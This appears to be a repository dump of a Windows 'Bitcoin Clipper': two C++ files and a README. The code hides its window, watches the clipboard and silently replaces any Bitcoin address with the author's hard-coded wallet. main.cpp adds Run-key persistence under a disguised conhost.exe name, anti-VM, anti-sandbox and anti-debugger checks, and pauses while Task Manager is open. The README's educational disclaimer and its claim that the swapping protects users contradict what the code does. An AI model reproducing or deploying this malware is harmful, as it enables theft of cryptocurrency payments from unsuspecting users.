├── simple.cpp ├── README.md └── main.cpp /simple.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #define WIN WINAPI 5 | 6 | int main(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 7 | std::regex R("([13][a-km-zA-HJ-NP-Z1-9]{25,34})|(bc1[ac-hj-np-z02-9]{39,59})"); 8 | std::string ClipboardText, LastClipboardText; 9 | HWND ConsoleWindow = GetConsoleWindow(); 10 | ShowWindow(ConsoleWindow, SW_HIDE); 11 | 12 | while (1) { 13 | if (IsClipboardFormatAvailable(CF_TEXT) && OpenClipboard(NULL)) { 14 | HANDLE ClipboardData = GetClipboardData(CF_TEXT); 15 | if (ClipboardData) { 16 | char* Text = static_cast(GlobalLock(ClipboardData)); 17 | if (Text && LastClipboardText != Text) { 18 | LastClipboardText = Text; 19 | if (std::regex_search(Text, R)) { 20 | std::string ModifiedText = std::regex_replace(Text, R, "bc1qj884lyzsat3v957cqefne9dnm0e378eesfk2pk"); 21 | if (OpenClipboard(NULL)) { 22 | EmptyClipboard(); 23 | HGLOBAL CopiedData = GlobalAlloc(GMEM_MOVEABLE, ModifiedText.size() + 1); 24 | if (CopiedData) { 25 | char* CopiedText = static_cast(GlobalLock(CopiedData)); 26 | if (CopiedText) { 27 | strcpy(CopiedText, ModifiedText.c_str()); 28 | GlobalUnlock(CopiedData); 29 | SetClipboardData(CF_TEXT, CopiedData); 30 | } 31 | } 32 | CloseClipboard(); 33 | } 34 | } 35 | } 36 | GlobalUnlock(ClipboardData); 37 | } 38 | CloseClipboard(); 39 | } 40 | Sleep(10); 41 | } 42 | return 0; 43 | } 44 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Bitcoin Clipper 2 | Simple Bitcoin Stealer By Manipulating Clipboard with Sandbox,Task Manager,VM detection. 3 | This repo was more of a fun project than actual serious malware. 4 | ## DISCLAIMER 5 | 6 | This code and any associated documentation are provided for educational and informational purposes only. It is intended to showcase techniques for identifying virtual machines and sandbox environments, which can be useful for understanding system contexts, security research, and threat detection. 7 | 8 | However, it is essential to understand that the use of this code or any derivative work for malicious or unethical purposes is strictly prohibited and illegal. Unauthorized intrusion, tampering with systems, or violating privacy can result in legal consequences and ethical concerns. 9 | 10 | # INFO 11 | ## Task Manager Interaction 12 | While the code monitors the Task Manager's activity, it may not be fully effective when Task Manager is open. One potential approach to enhance this functionality involves injecting the code into the Task Manager process to obscure its presence. However, to maintain a balance between stealth and anti-detection measures, the code is divided into two parts: 'simple.cpp' and 'main.cpp.' but 'main.cpp.' has obviously way more detection on virustotal. 13 | 14 | ## 'simple.cpp' 15 | The 'simple.cpp' component is designed with a minimal detection mechanism, ensuring that the clipboard manipulation works without modifying the system's startup settings. This approach aims to maintain a lower profile and reduce the chances of detection. 16 | # Admin Privilege Check: 17 | 18 | The code checks if the current user has administrative privileges. This information can be crucial for understanding the system's context. 19 | # Task Manager Detection: 20 | 21 | It checks whether the Task Manager is open. Task Manager is often used to monitor running processes and can be an indicator of a virtual environment. 22 | Move to Programs Directory: 23 | 24 | The code attempts to move the executable to the Windows "Programs" directory. This action is often performed by malware to persist on a system. 25 | Virtual Machine Detection: 26 | 27 | The code examines the system for various artifacts and services associated with virtualization software like VirtualBox, VMware, and others. The presence of these artifacts can suggest a virtual machine environment. 28 | # Sandbox Detection: 29 | 30 | The code employs a multifaceted approach to detect sandboxes: 31 | It checks for the presence of specific sandbox-related DLLs (e.g., SxIn.dll, SbieDll.dll). 32 | It examines known sandbox processes. 33 | It determines if virtualization is enabled (Intel VT-x or AMD-V). 34 | It checks for the presence of a debugger. 35 | It inspects environment variables associated with sandbox software. 36 | It analyzes low-level system information (e.g., CPU vendor string) to detect virtualized or sandboxed environments. 37 | Clipboard Manipulation: 38 | 39 | The code monitors the clipboard and searches for Bitcoin addresses. If detected, it replaces the addresses with a predefined one. This functionality may be used to prevent cryptocurrency address swapping attacks. 40 | # User Interface: 41 | 42 | The code provides a graphical user interface using a hidden console window. It ensures the program is run with administrative privileges and, if not, displays an error message. 43 | -------------------------------------------------------------------------------- /main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | bool IsUserAnAdmin() { 26 | BOOL isAdmin = false; 27 | SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY; 28 | PSID AdministratorsGroup; 29 | 30 | if (AllocateAndInitializeSid(&NtAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &AdministratorsGroup)) { 31 | if (CheckTokenMembership(NULL, AdministratorsGroup, &isAdmin)) { 32 | if (isAdmin) { 33 | std::wcout << L"Running with administrative privileges." << std::endl; 34 | } else { 35 | std::wcout << L"Not running with administrative privileges." << std::endl; 36 | } 37 | } 38 | FreeSid(AdministratorsGroup); 39 | } 40 | 41 | return isAdmin == TRUE; 42 | } 43 | 44 | 45 | 46 | bool IsTaskManagerOpen() { 47 | HWND hwnd = FindWindowW(nullptr, L"Task Manager"); 48 | return hwnd != NULL; 49 | } 50 | 51 | bool MoveToProgramsDirectory() { 52 | wchar_t currentPath[MAX_PATH]; 53 | GetModuleFileNameW(NULL, currentPath, MAX_PATH); 54 | 55 | if (PathFileExistsW(L"C:\\WINDOWS")) { 56 | std::wstring newFilePath = L"C:\\WINDOWS\\conhost.exe"; 57 | 58 | if (MoveFileW(currentPath, newFilePath.c_str())) { 59 | HKEY hKey; 60 | if (RegOpenKeyExW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_WRITE, &hKey) == ERROR_SUCCESS) { 61 | std::wstring appName = L"conhost"; // Desired name 62 | if (RegSetValueExW(hKey, appName.c_str(), 0, REG_SZ, (BYTE*)newFilePath.c_str(), (newFilePath.length() + 1) * sizeof(wchar_t)) == ERROR_SUCCESS) { 63 | RegCloseKey(hKey); 64 | return true; 65 | } 66 | RegCloseKey(hKey); 67 | } 68 | } 69 | } 70 | 71 | return false; 72 | } 73 | 74 | bool DetectVirtualMachine() { 75 | const wchar_t* vmArtifacts[] = { 76 | L"SOFTWARE\\Oracle\\VirtualBox Guest Additions", 77 | L"SYSTEM\\ControlSet001\\Services\\VBoxMouse", 78 | L"HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", 79 | L"SYSTEM\\ControlSet001\\Services\\Disk\\Enum", 80 | L"SOFTWARE\\VMware, Inc.\\VMware Tools", 81 | L"SYSTEM\\ControlSet001\\Services\\VMTools", 82 | L"SOFTWARE\\Microsoft\\Virtual Machine\\Guest\\Parameters\\PhysicalHostName", 83 | L"HARDWARE\\Description\\System\\SystemBiosVersion", 84 | L"SOFTWARE\\Microsoft\\Virtual Machine\\Guest\\Parameters\\HostName", 85 | L"SOFTWARE\\Microsoft\\Virtual Machine\\Guest\\Parameters\\VidPartitionTable" 86 | }; 87 | 88 | 89 | const wchar_t* vmServices[] = { 90 | L"VBoxService", 91 | L"VBoxTray", 92 | L"VMTools", 93 | L"VMware Physical Disk Helper Service", 94 | L"vmmemctl", 95 | L"qemu-ga", 96 | L"xensvc", 97 | L"hypervtools", 98 | L"XENBUS", 99 | L"VMSMP" 100 | }; 101 | 102 | for (const wchar_t* artifact : vmArtifacts) { 103 | HKEY hKey; 104 | if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, artifact, 0, KEY_READ, &hKey) == ERROR_SUCCESS) { 105 | RegCloseKey(hKey); 106 | return true; 107 | } 108 | } 109 | 110 | 111 | SC_HANDLE scm = OpenSCManagerW(NULL, NULL, SC_MANAGER_ALL_ACCESS); 112 | if (scm) { 113 | for (const wchar_t* service : vmServices) { 114 | SC_HANDLE serviceHandle = OpenServiceW(scm, service, SERVICE_QUERY_STATUS); 115 | if (serviceHandle) { 116 | CloseServiceHandle(serviceHandle); 117 | CloseServiceHandle(scm); 118 | return true; 119 | } 120 | } 121 | CloseServiceHandle(scm); 122 | } 123 | 124 | 125 | 126 | return false; 127 | } 128 | 129 | 130 | 131 | bool IsKnownSandboxProcess(); 132 | bool IsVirtualizationEnabled(); 133 | bool HasSandboxEnvironmentVariables(); 134 | bool HasLowLevelSystemInfo(); 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | bool DetectSandbox() { 143 | // Check for the presence of common sandbox artifacts 144 | if (GetModuleHandleW(L"cmdvrt32.dll") != NULL) { 145 | return true; 146 | } 147 | 148 | if (GetModuleHandleW(L"SxIn.dll") != NULL) { 149 | return true; 150 | } 151 | 152 | if (GetModuleHandleW(L"SbieDll.dll") != NULL) { 153 | return true; 154 | } 155 | 156 | 157 | if (IsKnownSandboxProcess()) { 158 | return true; 159 | } 160 | 161 | 162 | if (IsVirtualizationEnabled()) { 163 | return true; 164 | } 165 | 166 | 167 | if (IsDebuggerPresent()) { 168 | return true; 169 | } 170 | 171 | if (HasSandboxEnvironmentVariables()) { 172 | return true; 173 | } 174 | 175 | if (HasLowLevelSystemInfo()) { 176 | return true; 177 | } 178 | 179 | return false; 180 | } 181 | 182 | 183 | int _wcsicmp(const wchar_t* string1, const wchar_t* string2) { 184 | return _wcsicmp(string1, string2); 185 | } 186 | 187 | 188 | // Function to check for known sandbox processes 189 | bool IsKnownSandboxProcess() { 190 | // List of known sandbox processes to check for 191 | const wchar_t* sandboxProcesses[] = { 192 | L"vmware.exe", 193 | L"vboxservice.exe", 194 | L"vboxtray.exe", 195 | L"vmtoolsd.exe", 196 | L"vmacthlp.exe", 197 | L"vmsrvc.exe", // VMware service process 198 | L"vmnat.exe", // VMware network process 199 | L"vmmouse.exe", // VMware mouse process 200 | L"vmusbmouse.exe", // VMware USB mouse process 201 | L"vmscsi.exe", // VMware SCSI process 202 | L"vmxnet.exe", // VMware network adapter process 203 | L"vmauthd.exe", // VMware authorization service 204 | L"vmware-vmx.exe", // VMware virtual machine monitor 205 | L"vboxguest.exe", // VirtualBox Guest Additions 206 | L"vboxtray.exe", // VirtualBox system tray 207 | L"vboxdisp.exe", // VirtualBox Display Manager 208 | L"vboxusbmon.exe", // VirtualBox USB monitor 209 | L"vboxheadless.exe",// VirtualBox headless VM process 210 | L"vboxmanage.exe", // VirtualBox management tool 211 | L"vboxmmanage.exe", // VirtualBox Multisession Manager 212 | L"vboxsgr.exe", // VirtualBox Seamless Graphics 213 | L"qemu-ga.exe", // QEMU Guest Agent 214 | L"qemu-system-x86_64.exe", // QEMU system process 215 | L"vz.exe", // Virtuozzo 216 | L"prl_cc.exe", // Parallels Desktop Control Center 217 | L"prl_tools.exe", // Parallels Tools Service 218 | 219 | }; 220 | 221 | 222 | HANDLE hProcessSnap; 223 | PROCESSENTRY32W pe32; 224 | 225 | pe32.dwSize = sizeof(PROCESSENTRY32W); 226 | hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 227 | 228 | if (hProcessSnap == INVALID_HANDLE_VALUE) { 229 | return false; 230 | } 231 | 232 | if (Process32FirstW(hProcessSnap, &pe32)) { 233 | do { 234 | for (const wchar_t* sandboxProcess : sandboxProcesses) { 235 | 236 | if (wcscmp(pe32.szExeFile, sandboxProcess) == 0) { 237 | CloseHandle(hProcessSnap); 238 | return true; 239 | } 240 | } 241 | } while (Process32NextW(hProcessSnap, &pe32)); 242 | } 243 | 244 | CloseHandle(hProcessSnap); 245 | return false; 246 | } 247 | 248 | 249 | 250 | 251 | bool IsVirtualizationEnabled() { 252 | int cpuidData[4] = { 0 }; 253 | __asm__ __volatile__("cpuid" 254 | : "=a" (cpuidData[0]), "=b" (cpuidData[1]), "=c" (cpuidData[2]), "=d" (cpuidData[3]) 255 | : "a" (1), "c" (0)); 256 | 257 | 258 | bool intelVTXSupported = (cpuidData[2] & (1 << 5)) != 0; 259 | bool amdVSupported = (cpuidData[2] & (1 << 6)) != 0; 260 | 261 | if (intelVTXSupported || amdVSupported) { 262 | return true; 263 | } 264 | 265 | return false; 266 | } 267 | 268 | bool HasSandboxEnvironmentVariables() { 269 | const char* sandboxEnvVariables[] = { 270 | "Sandboxie", 271 | "XEN", 272 | "VBOX", 273 | "VMWARE", 274 | "QEMU", 275 | "GDBG", 276 | 277 | }; 278 | 279 | for (const char* envVariable : sandboxEnvVariables) { 280 | if (getenv(envVariable) != NULL) { 281 | return true; 282 | } 283 | } 284 | 285 | return false; 286 | } 287 | 288 | 289 | bool HasLowLevelSystemInfo() { 290 | 291 | unsigned int eax, ebx, ecx, edx; 292 | 293 | 294 | __asm__ __volatile__("cpuid" : "=a" (eax), "=b" (ebx), "=c" (ecx), "=d" (edx) : "a" (0)); 295 | char vendorString[13]; 296 | memcpy(vendorString, &ebx, 4); 297 | memcpy(vendorString + 4, &edx, 4); 298 | memcpy(vendorString + 8, &ecx, 4); 299 | vendorString[12] = '\0'; 300 | 301 | 302 | if (strcmp(vendorString, "VMwareVMware") == 0 || 303 | strcmp(vendorString, "KVMKVMKVM") == 0 || 304 | strcmp(vendorString, "Microsoft Hv") == 0) { 305 | return true; 306 | } 307 | 308 | 309 | unsigned long long start, end; 310 | __asm__ __volatile__("rdtsc" : "=A" (start)); 311 | Sleep(1000); // Sleep for 1 second 312 | __asm__ __volatile__("rdtsc" : "=A" (end)); 313 | 314 | 315 | if ((end - start) < 1000000) { 316 | return true; 317 | } 318 | 319 | 320 | 321 | return false; 322 | } 323 | 324 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 325 | if (!IsUserAnAdmin()) { 326 | MessageBoxW(NULL, L"Please run the program as an administrator.", L"Administrator Privileges Required", MB_ICONERROR | MB_OK); 327 | return 1; // Terminate the program 328 | } 329 | 330 | std::regex bitcoinAddressPattern("([13][a-km-zA-HJ-NP-Z1-9]{25,34})|(bc1[ac-hj-np-z02-9]{39,59})"); 331 | std::string lastClipboardText; 332 | bool isTaskManagerOpen = false; 333 | 334 | HWND hWnd = GetConsoleWindow(); 335 | ShowWindow(hWnd, SW_HIDE); // Hide console window 336 | 337 | 338 | while (true) { 339 | if (!isTaskManagerOpen) { 340 | if (IsTaskManagerOpen()) { 341 | isTaskManagerOpen = true; 342 | } else if (IsClipboardFormatAvailable(CF_TEXT) && OpenClipboard(NULL)) { 343 | HANDLE hData = GetClipboardData(CF_TEXT); 344 | if (hData) { 345 | char* clipboardText = static_cast(GlobalLock(hData)); 346 | if (clipboardText && lastClipboardText != clipboardText) { 347 | lastClipboardText = clipboardText; 348 | 349 | if (std::regex_search(clipboardText, bitcoinAddressPattern)) { 350 | std::string modifiedText = std::regex_replace(clipboardText, bitcoinAddressPattern, "bc1qj884lyzsat3v957cqefne9dnm0e378eesfk2pk"); 351 | 352 | if (OpenClipboard(NULL)) { 353 | EmptyClipboard(); 354 | HGLOBAL hClipboardData = GlobalAlloc(GMEM_MOVEABLE, modifiedText.size() + 1); 355 | if (hClipboardData) { 356 | char* pchData = static_cast(GlobalLock(hClipboardData)); 357 | if (pchData) { 358 | strcpy(pchData, modifiedText.c_str()); 359 | GlobalUnlock(hClipboardData); 360 | SetClipboardData(CF_TEXT, hClipboardData); 361 | } 362 | } 363 | CloseClipboard(); 364 | } 365 | } 366 | } 367 | GlobalUnlock(hData); 368 | } 369 | CloseClipboard(); 370 | } 371 | 372 | if (DetectVirtualMachine()) { 373 | std::wcout << L"Running in a virtual machine." << std::endl; 374 | return 1; 375 | } 376 | 377 | if (DetectSandbox()) { 378 | std::wcout << L"Running in a virtual machine or sandbox." << std::endl; 379 | return 1; // Terminate the program 380 | } 381 | } else { 382 | if (!IsTaskManagerOpen()) { 383 | isTaskManagerOpen = false; 384 | } 385 | } 386 | Sleep(100); 387 | } 388 | 389 | return 0; 390 | } 391 | --------------------------------------------------------------------------------